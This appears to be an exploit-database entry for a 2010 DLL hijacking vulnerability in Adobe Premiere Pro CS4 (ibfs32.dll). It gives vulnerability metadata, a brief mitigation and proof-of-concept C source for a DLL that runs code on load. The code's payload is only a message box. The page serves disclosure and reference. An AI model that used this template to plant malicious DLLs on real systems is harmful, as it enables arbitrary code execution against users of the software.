Adobe Premier Pro CS4 DLL Hijacking Exploit (ibfs32.dll)

vendor:

Premiere Pro

by:

Glafkos Charalambous

8,8

CVSS

HIGH

DLL Hijacking

427

CWE

Product Name: Premiere Pro

Affected Version From: CS4 v4.0.0 (314 (MC: 160820))

Affected Version To: CS4 v4.0.0 (314 (MC: 160820))

Patch Exists: NO

Related CWE: N/A

CPE: a:adobe:premiere_pro:4.0.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 7 x64 Ultimate

2010

Adobe Premier Pro CS4 DLL Hijacking Exploit (ibfs32.dll)

This exploit is related to Adobe Premier Pro CS4 DLL Hijacking vulnerability. It allows an attacker to execute arbitrary code by placing a malicious DLL file in the same directory as the vulnerable application. The vulnerable application will then load the malicious DLL instead of the legitimate one.

Mitigation:

To mitigate this vulnerability, applications should be configured to load DLLs from the system directory instead of the application directory.

Source

Exploit-DB raw data:

/* 
Exploit Title: Adobe Premier Pro CS4 DLL Hijacking Exploit (ibfs32.dll)
Date: August 25, 2010
Author: Glafkos Charalambous (glafkos[@]astalavista[dot]com)
Version: CS4 v4.0.0 (314 (MC: 160820))
Tested on: Windows 7 x64 Ultimate
Vulnerable extensions: .pproj .prfpset .prexport .prm .prmp .prpreset .prproj .prsl .prtl .vpr
Greetz: Astalavista, OffSEC, Exploit-DB
*/

#include <windows.h>

BOOL WINAPI DllMain (
            HANDLE    hinstDLL,
            DWORD     fdwReason,
            LPVOID    lpvReserved)
{
    switch (fdwReason)
	{
	case DLL_PROCESS_ATTACH:
		dll_hijack();
	case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
	break;
	}
	return TRUE;
}

int dll_hijack()
{
  MessageBox(0, "Adobe DLL Hijacking!", "DLL Message", MB_OK);
}